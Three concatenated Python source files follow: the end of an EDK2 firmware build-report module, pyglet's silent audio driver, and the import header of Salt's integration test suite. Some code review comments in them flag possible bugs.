        # Idempotent: invoke the (expensive) EOT tool at most once.
        if self._EotToolInvoked:
            return
        self._EotToolInvoked = True
        FvFileList = []
        for FvName in self._FvList:
            FvFile = os.path.join(self._FvDir, FvName + ".Fv")
            if os.path.isfile(FvFile):
                FvFileList.append(FvFile)
        if len(FvFileList) == 0:
            # Nothing to analyze; leave ItemList empty.
            return
        #
        # Write source file list and GUID file list to an intermediate file
        # as the input for EOT tool and dispatch List as the output file
        # from EOT tool.
        #
        SourceList = os.path.join(self._EotDir, "SourceFile.txt")
        GuidList = os.path.join(self._EotDir, "GuidList.txt")
        DispatchList = os.path.join(self._EotDir, "Dispatch.txt")

        TempFile = []
        for Item in self._SourceList:
            FileWrite(TempFile, Item)
        SaveFileOnChange(SourceList, "".join(TempFile), False)
        TempFile = []
        for Key in self._GuidMap:
            FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key]))
        SaveFileOnChange(GuidList, "".join(TempFile), False)

        try:
            from Eot.EotMain import Eot

            #
            # Invoke EOT tool and echo its runtime performance
            #
            EotStartTime = time.time()
            Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList,
                FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True)
            EotEndTime = time.time()
            EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime))))
            EdkLogger.quiet("EOT run time: %s\n" % EotDuration)

            #
            # Parse the output of EOT tool
            #
            for Line in open(DispatchList):
                if len(Line.split()) < 4:
                    continue
                (Guid, Phase, FfsName, FilePath) = Line.split()
                # Prefer the INF-declared entry point name over the FFS name.
                Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0]
                if len(Symbol) > self.MaxLen:
                    self.MaxLen = len(Symbol)
                self.ItemList.append((Phase, Symbol, FilePath))
        except:
            # Best-effort: a failed EOT run degrades to a warning, not a
            # build failure.
            EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
            EdkLogger.warn(None, "Failed to generate execution order prediction report, for some error occurred in executing EOT.")
    ##
    # Generate platform execution order report
    #
    # This function generates the predicted module execution order.
    #
    # @param self The object pointer
    # @param File The file object for report
    #
    def _GenerateExecutionOrderReport(self, File):
        self._InvokeEotTool()
        if len(self.ItemList) == 0:
            return
        FileWrite(File, gSectionStart)
        FileWrite(File, "Execution Order Prediction")
        FileWrite(File, "*P PEI phase")
        FileWrite(File, "*D DXE phase")
        FileWrite(File, "*E Module INF entry point name")
        FileWrite(File, "*N Module notification function name")
        FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path"))
        FileWrite(File, gSectionSep)
        for Item in self.ItemList:
            FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2]))
        FileWrite(File, gSectionStart)
    ##
    # Generate Fixed Address report.
    #
    # This function generate the predicted fixed address report for a module
    # specified by Guid.
    #
    # @param self The object pointer
    # @param File The file object for report
    # @param Guid The module Guid value.
    # @param NotifyList The list of all notify function in a module
    #
    def _GenerateFixedAddressReport(self, File, Guid, NotifyList):
        self._ParseMapFile()
        FixedAddressList = self.FixedMapDict.get(Guid)
        if not FixedAddressList:
            return

        FileWrite(File, gSubSectionStart)
        FileWrite(File, "Fixed Address Prediction")
        FileWrite(File, "*I Image Loading Address")
        FileWrite(File, "*E Entry Point Address")
        FileWrite(File, "*N Notification Function Address")
        FileWrite(File, "*F Flash Address")
        FileWrite(File, "*M Memory Address")
        FileWrite(File, "*S SMM RAM Offset")
        FileWrite(File, "TOM Top of Memory")
        FileWrite(File, "Type Address Name")
        FileWrite(File, gSubSectionSep)
        for Item in FixedAddressList:
            Type = Item[0]
            Value = Item[1]
            Symbol = Item[2]
            if Symbol == "*I":
                Name = "(Image Base)"
            elif Symbol == "*E":
                Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1]
            elif Symbol in NotifyList:
                Name = Symbol
                Symbol = "*N"
            else:
                continue

            # Second marker letter encodes the address space of the value.
            if "Flash" in Type:
                Symbol += "F"
            elif "Memory" in Type:
                Symbol += "M"
            else:
                Symbol += "S"

            # Negative values are offsets back from the top of memory.
            if Value[0] == "-":
                Value = "TOM" + Value

            FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name))
    ##
    # Generate report for the prediction part
    #
    # This function generate the predicted fixed address report for a module or
    # predicted module execution order for a platform.
    # If the input Guid is None, then, it generates the predicted module execution order;
    # otherwise it generated the module fixed loading address for the module specified by
    # Guid.
    #
    # @param self The object pointer
    # @param File The file object for report
    # @param Guid The module Guid value.
    #
    def GenerateReport(self, File, Guid):
        if Guid:
            self._GenerateFixedAddressReport(File, Guid.upper(), [])
        else:
            self._GenerateExecutionOrderReport(File)
##
# Reports FD region information
#
# This class reports the FD subsection in the build report file.
# It collects region information of platform flash device.
# If the region is a firmware volume, it lists the set of modules
# and its space information; otherwise, it only lists its region name,
# base address and size in its sub-section header.
# If there are nesting FVs, the nested FVs will list immediate after
# this FD region subsection
#
class FdRegionReport(object):
    ##
    # Discover all the nested FV name list.
    #
    # This is an internal worker function to discover the all the nested FV information
    # in the parent firmware volume. It uses deep first search algorithm recursively to
    # find all the FV list name and append them to the list.
    #
    # @param self The object pointer
    # @param FvName The name of current firmware file system
    # @param Wa Workspace context information
    #
    def _DiscoverNestedFvList(self, FvName, Wa):
        FvDictKey=FvName.upper()
        if FvDictKey in Wa.FdfProfile.FvDict:
            for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
                for Section in Ffs.SectionList:
                    try:
                        for FvSection in Section.SectionList:
                            if FvSection.FvName in self.FvList:
                                continue
                            # Record the nested FV and recurse into it.
                            self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName
                            self.FvList.append(FvSection.FvName)
                            self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0)
                            self._DiscoverNestedFvList(FvSection.FvName, Wa)
                    except AttributeError:
                        # Leaf sections have no SectionList.
                        pass
    ##
    # Constructor function for class FdRegionReport
    #
    # This constructor function generates FdRegionReport object for a specified FdRegion.
    # If the FdRegion is a firmware volume, it will recursively find all its nested Firmware
    # volume list. This function also collects GUID map in order to dump module identification
    # in the final report.
    #
    # @param self: The object pointer
    # @param FdRegion The current FdRegion object
    # @param Wa Workspace context information
    #
    def __init__(self, FdRegion, Wa):
        self.Type = FdRegion.RegionType
        self.BaseAddress = FdRegion.Offset
        self.Size = FdRegion.Size
        self.FvList = []
        self.FvInfo = {}
        self._GuidsDb = {}    # GUID string -> human-readable identification
        self._FvDir = Wa.FvDir
        self._WorkspaceDir = Wa.WorkspaceDir

        #
        # If the input FdRegion is not a firmware volume,
        # we are done.
        #
        if self.Type != BINARY_FILE_TYPE_FV:
            return

        #
        # Find all nested FVs in the FdRegion
        #
        for FvName in FdRegion.RegionDataList:
            if FvName in self.FvList:
                continue
            self.FvList.append(FvName)
            self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size)
            self._DiscoverNestedFvList(FvName, Wa)

        PlatformPcds = {}
        #
        # Collect PCDs declared in DEC files.
        #
        for Pa in Wa.AutoGenObjectList:
            for Package in Pa.PackageList:
                for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
                    DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
                    PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue
        #
        # Collect PCDs defined in DSC file
        #
        # DSC values overwrite DEC defaults collected above.
        for Pa in Wa.AutoGenObjectList:
            for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
                DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue
                PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue

        #
        # Add PEI and DXE a priori files GUIDs defined in PI specification.
        #
        self._GuidsDb[PEI_APRIORI_GUID] = "PEI Apriori"
        self._GuidsDb[DXE_APRIORI_GUID] = "DXE Apriori"
        #
        # Add ACPI table storage file
        #
        self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage"

        # Identify every platform module by "BaseName (INF path)".
        for Pa in Wa.AutoGenObjectList:
            for ModuleKey in Pa.Platform.Modules:
                M = Pa.Platform.Modules[ModuleKey].M
                InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File)
                self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath)

        #
        # Collect the GUID map in the FV firmware volume
        #
        for FvName in self.FvList:
            FvDictKey=FvName.upper()
            if FvDictKey in Wa.FdfProfile.FvDict:
                for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
                    try:
                        #
                        # collect GUID map for binary EFI file in FDF file.
                        #
                        Guid = Ffs.NameGuid.upper()
                        # FFS names of the form Guid.TokenSpace.Token are PCDs
                        # whose value is the actual GUID byte array.
                        Match = gPcdGuidPattern.match(Ffs.NameGuid)
                        if Match:
                            PcdTokenspace = Match.group(1)
                            PcdToken = Match.group(2)
                            if (PcdToken, PcdTokenspace) in PlatformPcds:
                                GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)]
                                Guid = GuidStructureByteArrayToGuidString(GuidValue).upper()
                        for Section in Ffs.SectionList:
                            try:
                                ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName)
                                self._GuidsDb[Guid] = ModuleSectFile
                            except AttributeError:
                                pass
                    except AttributeError:
                        pass
    ##
    # Internal worker function to generate report for the FD region
    #
    # This internal worker function to generate report for the FD region.
    # It the type is firmware volume, it lists offset and module identification.
    #
    # @param self The object pointer
    # @param File The file object for report
    # @param Title The title for the FD subsection
    # @param BaseAddress The base address for the FD region
    # @param Size The size of the FD region
    # @param FvName The FV name if the FD region is a firmware volume
    #
    def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None):
        FileWrite(File, gSubSectionStart)
        FileWrite(File, Title)
        FileWrite(File, "Type: %s" % Type)
        FileWrite(File, "Base Address: 0x%X" % BaseAddress)

        if self.Type == BINARY_FILE_TYPE_FV:
            FvTotalSize = 0
            FvTakenSize = 0
            FvFreeSize = 0
            if FvName.upper().endswith('.FV'):
                FileExt = FvName + ".txt"
            else:
                FileExt = FvName + ".Fv.txt"

            # Resolve the GenFv report file: CWD-relative, then workspace,
            # then the build FV directory.
            # NOTE(review): if FileExt exists relative to CWD, FvReportFileName
            # is never bound and the open() below raises NameError -- verify.
            if not os.path.isfile(FileExt):
                FvReportFileName = mws.join(self._WorkspaceDir, FileExt)
                if not os.path.isfile(FvReportFileName):
                    FvReportFileName = os.path.join(self._FvDir, FileExt)
            try:
                #
                # Collect size info in the firmware volume.
                #
                FvReport = open(FvReportFileName).read()
                Match = gFvTotalSizePattern.search(FvReport)
                if Match:
                    FvTotalSize = int(Match.group(1), 16)
                Match = gFvTakenSizePattern.search(FvReport)
                if Match:
                    FvTakenSize = int(Match.group(1), 16)
                FvFreeSize = FvTotalSize - FvTakenSize
                #
                # Write size information to the report file.
                #
                # NOTE(review): FvTakenSize * 100.0 / FvTotalSize divides by
                # zero if the total-size pattern is missing -- confirm the
                # GenFv report always contains it.
                FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0))
                FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize))
                FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0))
                FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0))
                FileWrite(File, "Offset Module")
                FileWrite(File, gSubSectionSep)
                #
                # Write module offset and module identification to the report file.
                #
                OffsetInfo = {}
                for Match in gOffsetGuidPattern.finditer(FvReport):
                    Guid = Match.group(2).upper()
                    OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid)
                OffsetList = sorted(OffsetInfo.keys())
                for Offset in OffsetList:
                    FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset]))
            except IOError:
                EdkLogger.warn(None, "Fail to read report file", FvReportFileName)
        else:
            FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0))
        FileWrite(File, gSubSectionEnd)
    ##
    # Generate report for the FD region
    #
    # This function generates report for the FD region.
    #
    # @param self The object pointer
    # @param File The file object for report
    #
    def GenerateReport(self, File):
        if (len(self.FvList) > 0):
            for FvItem in self.FvList:
                Info = self.FvInfo[FvItem]
                self._GenerateReport(File, Info[0], TAB_FV_DIRECTORY, Info[1], Info[2], FvItem)
        else:
            self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size)
##
# Reports FD information
#
# This class reports the FD section in the build report file.
# It collects flash device information for a platform.
#
class FdReport(object):
    ##
    # Constructor function for class FdReport
    #
    # This constructor function generates FdReport object for a specified
    # firmware device.
    #
    # @param self The object pointer
    # @param Fd The current Firmware device object
    # @param Wa Workspace context information
    #
    def __init__(self, Fd, Wa):
        self.FdName = Fd.FdUiName
        self.BaseAddress = Fd.BaseAddress
        self.Size = Fd.Size
        self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList]
        self.FvPath = os.path.join(Wa.BuildDir, TAB_FV_DIRECTORY)
        self.VPDBaseAddress = 0
        self.VPDSize = 0
        # Locate the VPD file region (identified by the platform's VPD tool
        # GUID) so its base/size can head the "FD VPD Region" subsection.
        for index, FdRegion in enumerate(Fd.RegionList):
            if str(FdRegion.RegionType) == 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
                self.VPDBaseAddress = self.FdRegionList[index].BaseAddress
                self.VPDSize = self.FdRegionList[index].Size
                break
    ##
    # Generate report for the firmware device.
    #
    # This function generates report for the firmware device.
    #
    # @param self The object pointer
    # @param File The file object for report
    #
    def GenerateReport(self, File):
        FileWrite(File, gSectionStart)
        FileWrite(File, "Firmware Device (FD)")
        FileWrite(File, "FD Name: %s" % self.FdName)
        FileWrite(File, "Base Address: %s" % self.BaseAddress)
        FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0))
        if len(self.FdRegionList) > 0:
            FileWrite(File, gSectionSep)
            for FdRegionItem in self.FdRegionList:
                FdRegionItem.GenerateReport(File)
        # VPDPcdList is a module-level list, presumably populated while the
        # PCD section prints VPD-typed PCDs (see its use earlier in this
        # file) -- entries are (name, sku, offset, max size, value) tuples.
        if VPDPcdList:
            VPDPcdList.sort(key=lambda x: int(x[2], 0))
            FileWrite(File, gSubSectionStart)
            FileWrite(File, "FD VPD Region")
            FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress)
            FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0))
            FileWrite(File, gSubSectionSep)
            for item in VPDPcdList:
                # Add BaseAddress for offset
                Offset = '0x%08X' % (int(item[2], 16) + self.VPDBaseAddress)
                IsByteArray, ArrayList = ByteArrayForamt(item[-1])
                Skuinfo = item[1]
                # Single-SKU platforms report the one configured SKU id.
                if len(GlobalData.gSkuids) == 1 :
                    Skuinfo = GlobalData.gSkuids[0]
                if IsByteArray:
                    FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], '{'))
                    for Array in ArrayList:
                        FileWrite(File, Array)
                else:
                    FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], item[-1]))
            FileWrite(File, gSubSectionEnd)
        FileWrite(File, gSectionEnd)
##
# Reports platform information
#
# This class reports the whole platform information
#
class PlatformReport(object):
    ##
    # Constructor function for class PlatformReport
    #
    # This constructor function generates PlatformReport object a platform build.
    # It generates report for platform summary, flash, global PCDs and detailed
    # module information for modules involved in platform build.
    #
    # @param self The object pointer
    # @param Wa Workspace context information
    # @param MaList The list of modules in the platform build
    #
    def __init__(self, Wa, MaList, ReportType):
        self._WorkspaceDir = Wa.WorkspaceDir
        self.PlatformName = Wa.Name
        self.PlatformDscPath = Wa.Platform
        self.Architectures = " ".join(Wa.ArchList)
        self.ToolChain = Wa.ToolChain
        self.Target = Wa.BuildTarget
        self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir)
        self.BuildEnvironment = platform.platform()

        # Each sub-report is only constructed when its section is requested.
        self.PcdReport = None
        if "PCD" in ReportType:
            self.PcdReport = PcdReport(Wa)

        self.FdReportList = []
        # FLASH is a platform-level section; skip it for module-only builds.
        if "FLASH" in ReportType and Wa.FdfProfile and MaList is None:
            for Fd in Wa.FdfProfile.FdDict:
                self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa))

        self.PredictionReport = None
        if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType:
            self.PredictionReport = PredictionReport(Wa)

        self.DepexParser = None
        if "DEPEX" in ReportType:
            self.DepexParser = DepexParser(Wa)

        self.ModuleReportList = []
        if MaList is not None:
            self._IsModuleBuild = True
            for Ma in MaList:
                self.ModuleReportList.append(ModuleReport(Ma, ReportType))
        else:
            self._IsModuleBuild = False
            for Pa in Wa.AutoGenObjectList:
                ModuleAutoGenList = []
                for ModuleKey in Pa.Platform.Modules:
                    ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M)
                # Also pick up modules referenced only by the FDF file.
                if GlobalData.gFdfParser is not None:
                    if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict:
                        INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch]
                        for InfName in INFList:
                            InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch)
                            Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile, Pa.DataPipe)
                            if Ma is None:
                                continue
                            if Ma not in ModuleAutoGenList:
                                ModuleAutoGenList.append(Ma)
                for MGen in ModuleAutoGenList:
                    self.ModuleReportList.append(ModuleReport(MGen, ReportType))
    ##
    # Generate report for the whole platform.
    #
    # This function generates report for platform information.
    # It comprises of platform summary, global PCD, flash and
    # module list sections.
    #
    # @param self The object pointer
    # @param File The file object for report
    # @param BuildDuration The total time to build the modules
    # @param AutoGenTime The total time of AutoGen Phase
    # @param MakeTime The total time of Make Phase
    # @param GenFdsTime The total time of GenFds Phase
    # @param ReportType The kind of report items in the final report file
    #
    def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType):
        FileWrite(File, "Platform Summary")
        FileWrite(File, "Platform Name: %s" % self.PlatformName)
        FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath)
        FileWrite(File, "Architectures: %s" % self.Architectures)
        FileWrite(File, "Tool Chain: %s" % self.ToolChain)
        FileWrite(File, "Target: %s" % self.Target)
        if GlobalData.gSkuids:
            FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids))
        if GlobalData.gDefaultStores:
            FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores))
        FileWrite(File, "Output Path: %s" % self.OutputPath)
        FileWrite(File, "Build Environment: %s" % self.BuildEnvironment)
        FileWrite(File, "Build Duration: %s" % BuildDuration)
        if AutoGenTime:
            FileWrite(File, "AutoGen Duration: %s" % AutoGenTime)
        if MakeTime:
            FileWrite(File, "Make Duration: %s" % MakeTime)
        if GenFdsTime:
            FileWrite(File, "GenFds Duration: %s" % GenFdsTime)
        FileWrite(File, "Report Content: %s" % ", ".join(ReportType))

        # Warn about PCDs accessed through more than one access method.
        if GlobalData.MixedPcd:
            FileWrite(File, gSectionStart)
            FileWrite(File, "The following PCDs use different access methods:")
            FileWrite(File, gSectionSep)
            for PcdItem in GlobalData.MixedPcd:
                FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0])))
            FileWrite(File, gSectionEnd)

        # Platform-level sections first, then per-module sections, then
        # the platform-level execution-order prediction.
        if not self._IsModuleBuild:
            if "PCD" in ReportType:
                self.PcdReport.GenerateReport(File, None)

            if "FLASH" in ReportType:
                for FdReportListItem in self.FdReportList:
                    FdReportListItem.GenerateReport(File)

        for ModuleReportItem in self.ModuleReportList:
            ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType)

        if not self._IsModuleBuild:
            if "EXECUTION_ORDER" in ReportType:
                self.PredictionReport.GenerateReport(File, None)
## BuildReport class
#
# This base class contain the routines to collect data and then
# applies certain format to the output report
#
class BuildReport(object):
    ##
    # Constructor function for class BuildReport
    #
    # This constructor function generates BuildReport object a platform build.
    # It generates report for platform summary, flash, global PCDs and detailed
    # module information for modules involved in platform build.
    #
    # @param self The object pointer
    # @param ReportFile The file name to save report file
    # @param ReportType The kind of report items in the final report file
    #
    def __init__(self, ReportFile, ReportType):
        self.ReportFile = ReportFile
        # A falsy ReportFile disables report generation entirely; the other
        # attributes are then never used.
        if ReportFile:
            self.ReportList = []    # (Wa, MaList) pairs queued by AddPlatformReport
            self.ReportType = []
            if ReportType:
                # De-duplicate while preserving the caller's ordering.
                for ReportTypeItem in ReportType:
                    if ReportTypeItem not in self.ReportType:
                        self.ReportType.append(ReportTypeItem)
            else:
                self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"]
    ##
    # Adds platform report to the list
    #
    # This function adds a platform report to the final report list.
    #
    # @param self The object pointer
    # @param Wa Workspace context information
    # @param MaList The list of modules in the platform build
    #
    def AddPlatformReport(self, Wa, MaList=None):
        if self.ReportFile:
            self.ReportList.append((Wa, MaList))
    ##
    # Generates the final report.
    #
    # This function generates platform build report. It invokes GenerateReport()
    # method for every platform report in the list.
    #
    # @param self The object pointer
    # @param BuildDuration The total time to build the modules
    # @param AutoGenTime The total time of AutoGen phase
    # @param MakeTime The total time of Make phase
    # @param GenFdsTime The total time of GenFds phase
    #
    def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime):
        if self.ReportFile:
            try:
                # File is an in-memory list of lines; FileWrite appends to it.
                File = []
                for (Wa, MaList) in self.ReportList:
                    PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType)
                Content = FileLinesSplit(''.join(File), gLineMaxLength)
                SaveFileOnChange(self.ReportFile, Content, False)
                EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile))
            except IOError:
                EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile)
            except:
                # Report generation is best-effort: log the traceback but do
                # not fail the build (RaiseError=False).
                EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False)
                EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
# This acts like the main() function for the script, unless it is 'import'ed into another script.
if __name__ == '__main__':
    pass  # Library module: no standalone behavior when executed directly.
|
silent.py | #!/usr/bin/env python
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import time
from pyglet.media import AbstractAudioPlayer, AbstractAudioDriver, \
MediaThread, MediaEvent
import pyglet
_debug = pyglet.options['debug_media']
class SilentAudioPacket(object):
    """A span of silent audio, tracked only by its timestamp and duration."""

    def __init__(self, timestamp, duration):
        self.timestamp = timestamp
        self.duration = duration

    def consume(self, dt):
        """Advance the packet by `dt` seconds, shrinking what remains."""
        self.timestamp = self.timestamp + dt
        self.duration = self.duration - dt
class SilentAudioPlayerPacketConsumer(AbstractAudioPlayer):
    # Audio player that consumes (and discards) audio packets in real time,
    # so that video frames and media events stay paced even though no sound
    # device is available.  A worker thread drains buffered packet time and
    # dispatches events; self._thread.condition guards all shared state.

    # When playing video, length of audio (in secs) to buffer ahead.
    _buffer_time = 0.4

    # Minimum number of bytes to request from source
    _min_update_bytes = 1024

    # Maximum sleep time
    _sleep_time = 0.2

    def __init__(self, source_group, player):
        super(SilentAudioPlayerPacketConsumer, self).__init__(source_group, player)

        # System time of first timestamp
        self._timestamp_time = None

        # List of buffered SilentAudioPacket
        self._packets = []
        self._packets_duration = 0
        self._events = []

        # Actual play state.
        self._playing = False

        # TODO Be nice to avoid creating this thread if user doesn't care
        # about EOS events and there's no video format.
        # NOTE Use thread.condition as lock for all instance vars used by worker
        self._thread = MediaThread(target=self._worker_func)
        if source_group.audio_format:
            self._thread.start()

    def delete(self):
        # Ask the worker thread to exit; it checks thread.stopped each pass.
        if _debug:
            print 'SilentAudioPlayer.delete'
        self._thread.stop()

    def play(self):
        if _debug:
            print 'SilentAudioPlayer.play'
        self._thread.condition.acquire()
        if not self._playing:
            self._playing = True
            # Anchor buffered timestamps to the wall clock from this moment.
            self._timestamp_time = time.time()
            self._thread.condition.notify()
        self._thread.condition.release()

    def stop(self):
        if _debug:
            print 'SilentAudioPlayer.stop'
        self._thread.condition.acquire()
        if self._playing:
            # Consume the head packet up to the current position so resuming
            # continues from the right timestamp.
            timestamp = self.get_time()
            if self._packets:
                packet = self._packets[0]
                self._packets_duration -= timestamp - packet.timestamp
                packet.consume(timestamp - packet.timestamp)
            self._playing = False
        self._thread.condition.release()

    def clear(self):
        # Drop all buffered packets and pending events (e.g. on seek).
        if _debug:
            print 'SilentAudioPlayer.clear'
        self._thread.condition.acquire()
        del self._packets[:]
        self._packets_duration = 0
        del self._events[:]
        self._thread.condition.release()

    def get_time(self):
        if _debug:
            print 'SilentAudioPlayer.get_time()'
        self._thread.condition.acquire()
        packets = self._packets
        if self._playing:
            # Consume timestamps
            result = None
            offset = time.time() - self._timestamp_time
            while packets:
                packet = packets[0]
                if offset > packet.duration:
                    # Wall-clock time fully covers this packet; drop it.
                    del packets[0]
                    self._timestamp_time += packet.duration
                    offset -= packet.duration
                    self._packets_duration -= packet.duration
                else:
                    # Partially consume the head packet and report its time.
                    packet.consume(offset)
                    self._packets_duration -= offset
                    self._timestamp_time += offset
                    result = packet.timestamp
                    break
        else:
            # Paused
            if packets:
                result = packets[0].timestamp
            else:
                result = None
        self._thread.condition.release()
        if _debug:
            print 'SilentAudioPlayer.get_time() -> ', result
        return result

    # Worker func that consumes audio data and dispatches events
    def _worker_func(self):
        thread = self._thread
        #buffered_time = 0
        eos = False
        events = self._events
        while True:
            thread.condition.acquire()
            if thread.stopped or (eos and not events):
                thread.condition.release()
                break

            # Use up "buffered" audio based on amount of time passed.
            timestamp = self.get_time()
            if _debug:
                print 'timestamp: %r' % timestamp

            # Dispatch events
            # NOTE(review): if the head event's timestamp is still in the
            # future, this loop never removes it and spins while holding the
            # condition -- confirm an 'else: break' is not missing here.
            while events and timestamp is not None:
                if (events[0].timestamp is None or
                    events[0].timestamp <= timestamp):
                    events[0]._sync_dispatch_to_player(self.player)
                    del events[0]

            # Calculate how much data to request from source
            secs = self._buffer_time - self._packets_duration
            bytes = secs * self.source_group.audio_format.bytes_per_second
            if _debug:
                print 'Trying to buffer %d bytes (%r secs)' % (bytes, secs)

            while bytes > self._min_update_bytes and not eos:
                # Pull audio data from source
                audio_data = self.source_group.get_audio_data(int(bytes))
                if not audio_data and not eos:
                    events.append(MediaEvent(timestamp, 'on_eos'))
                    events.append(MediaEvent(timestamp, 'on_source_group_eos'))
                    eos = True
                    break

                # Pretend to buffer audio data, collect events.
                if self._playing and not self._packets:
                    # First packet while playing re-anchors the clock.
                    self._timestamp_time = time.time()
                self._packets.append(SilentAudioPacket(audio_data.timestamp,
                                                       audio_data.duration))
                self._packets_duration += audio_data.duration
                # NOTE(review): each event is appended in the loop AND again
                # by the extend() below, so events appear twice in the queue
                # -- verify this double-append is intentional.
                for event in audio_data.events:
                    event.timestamp += audio_data.timestamp
                    events.append(event)
                events.extend(audio_data.events)
                bytes -= audio_data.length

            # Sleep until the next event is due, capped at _sleep_time;
            # sleep indefinitely (until notified) while paused.
            sleep_time = self._sleep_time
            if not self._playing:
                sleep_time = None
            elif events and events[0].timestamp and timestamp:
                sleep_time = min(sleep_time, events[0].timestamp - timestamp)
            if _debug:
                print 'SilentAudioPlayer(Worker).sleep', sleep_time
            thread.sleep(sleep_time)
            thread.condition.release()
class SilentTimeAudioPlayer(AbstractAudioPlayer):
    # Wall-clock based fake audio player: it reports a playback time but
    # never touches any audio data.
    #
    # Note that when using this player (automatic if playing back video with
    # unsupported audio codec) no events are dispatched (because they are
    # normally encoded in the audio packet -- so no EOS events are delivered.
    # This is a design flaw.
    #
    # Also, seeking is broken because the timestamps aren't synchronized with
    # the source group.
    _time = 0.0      # playback time accumulated while stopped
    _systime = None  # wall-clock time of the last play(); None while stopped

    def play(self):
        self._systime = time.time()

    def stop(self):
        self._time = self.get_time()
        self._systime = None

    def delete(self):
        pass

    def clear(self):
        pass

    def get_time(self):
        # Stopped: frozen time.  Playing: frozen time plus elapsed wall clock.
        if self._systime is None:
            return self._time
        return self._time + (time.time() - self._systime)
class SilentAudioDriver(AbstractAudioDriver):
    # Driver that produces no sound.  Sources with an audio stream are
    # consumed in (pretend) real time; audio-less sources just get a clock.
    def create_audio_player(self, source_group, player):
        if not source_group.audio_format:
            return SilentTimeAudioPlayer(source_group, player)
        return SilentAudioPlayerPacketConsumer(source_group, player)
def create_audio_driver():
    # Factory entry point used by the driver-selection machinery.
    driver = SilentAudioDriver()
    return driver
|
__init__.py | # -*- coding: utf-8 -*-
'''
Set up the Salt integration test suite
'''
# Import Python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import json
import time
import stat
import errno
import signal
import shutil
import pprint
import atexit
import socket
import logging
import tempfile
import threading
import subprocess
import multiprocessing
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
# Import salt tests support dirs
from tests.support.paths import * # pylint: disable=wildcard-import
from tests.support.processes import * # pylint: disable=wildcard-import
